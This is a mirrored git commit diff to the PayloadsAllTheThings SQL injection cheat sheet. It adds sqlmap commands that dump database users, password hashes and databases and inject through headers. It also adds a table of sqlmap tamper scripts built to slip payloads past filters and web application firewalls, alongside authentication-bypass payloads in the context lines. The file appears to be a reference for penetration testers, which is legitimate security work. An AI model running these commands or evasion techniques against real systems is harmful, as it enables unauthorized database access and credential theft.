mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
SQL injection - Tamper script
This commit is contained in:
parent
07388503b0
commit
d6eaa26820
1 changed files with 68 additions and 5 deletions
|
@ -1,10 +1,6 @@
|
|||
# SQL injection
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## SQL injection using SQLmap
|
||||
```
|
||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||
```
|
||||
|
||||
## Entry point detection
|
||||
Detection of an SQL injection entry point
|
||||
|
@ -26,6 +22,72 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
|||
transformed into U+0027 APOSTROPHE (')
|
||||
```
|
||||
|
||||
|
||||
|
||||
## SQL injection using SQLmap
|
||||
Basic arguments for SQLmap
|
||||
```
|
||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||
```
|
||||
|
||||
Custom injection in UserAgent/Header/Referer/Cookie
|
||||
```
|
||||
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
|
||||
```
|
||||
|
||||
General tamper option and tamper's list
|
||||
```
|
||||
tamper=name_of_the_tamper
|
||||
```
|
||||
|
||||
| Tamper | Description |
|
||||
| --- | --- |
|
||||
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|
||||
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|
||||
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|
||||
|base64encode.py | Base64 all characters in a given payload |
|
||||
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|
||||
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|
||||
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
|
||||
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|
||||
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
|
||||
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|
||||
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|
||||
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|
||||
|equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' |
|
||||
|escapequotes.py | Slash escape quotes (' and ") |
|
||||
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|
||||
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|
||||
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|
||||
|modsecurityversioned.py | Embraces complete query with versioned comment |
|
||||
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|
||||
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|
||||
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|
||||
|percentage.py | Adds a percentage sign ('%') infront of each character |
|
||||
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
|
||||
|randomcase.py | Replaces each keyword character with random case value |
|
||||
|randomcomments.py | Add random comments to SQL keywords|
|
||||
|securesphere.py | Appends special crafted string|
|
||||
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|
||||
|space2comment.py | Replaces space character (' ') with comments |
|
||||
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|
||||
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|
||||
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|
||||
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|
||||
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|
||||
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|
||||
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|
||||
|space2plus.py | Replaces space character (' ') with plus ('+') |
|
||||
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|
||||
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|
||||
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|
||||
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|
||||
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|
||||
|varnish.py | Append a HTTP header 'X-originating-IP' |
|
||||
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
|
||||
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|
||||
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
|
||||
|
||||
## Authentication bypass
|
||||
```
|
||||
'-'
|
||||
|
@ -165,4 +227,5 @@ WHERE -> HAVING
|
|||
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
|
||||
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
|
||||
- [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
|
||||
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
||||
- [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
|
||||
- [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
|
Loading…
Reference in a new issue